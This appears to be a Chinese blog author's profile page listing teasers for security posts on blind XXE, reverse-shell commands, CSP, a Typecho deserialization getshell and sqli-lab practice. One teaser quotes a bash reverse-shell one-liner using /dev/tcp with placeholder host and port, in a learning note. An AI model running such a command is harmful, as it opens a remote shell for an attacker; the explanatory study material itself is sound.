240 发简信
  • 记一次blind-XXE漏洞的利用

    背景 介绍XXE漏洞的文章已经很多了,这里就不啰嗦再写。这次的XXE是某系统页面提交一个xml文件来进行license验证的过程中形成的。XXE...

  • The quick brown fox,jumped over the fence

    一、起因 好久没有写点东西了,主要是在学习《Accelerated C++》这本书的时候遇到一个小习题,开始的时候没有读懂题意,等着读懂题意了以...

  • linux 反弹shell命令解析

    渗透做的很少,连最基础的都不会,做下笔记。。。 bash -i >& /dev/tcp/HOST/PORT 0>&1 1. bash -i 这句...

  • Content Security Policy

    0x00简介 Content Security Policy(CSP),直译过来就是内容安全策略,是一种前端安全机制,用以防止一些前端存在的攻击...

  • 120
    Typecho引发的pop惨案

    一直是知道php也有反序列化漏洞,但是从来没有跟进学习过,这次的typecho前台getshell在安全圈引起了比较大的关注,也很早就看了一遍鹿...

  • wamp环境服务版本添加

    某些漏洞需要配合php某些漏洞来进行复现,而php修补漏洞也比较勤快;某些工具需要在一定版本下的mysql下运行,而高版本的mysql不支持。所...

  • sqli-lab收尾

    0x01 写在开头 废弃博客了,也没有人看,管理起来也比较费劲,之后就写到onenote然后复制到简书好了。 接触到sqli-lab应该是一年以...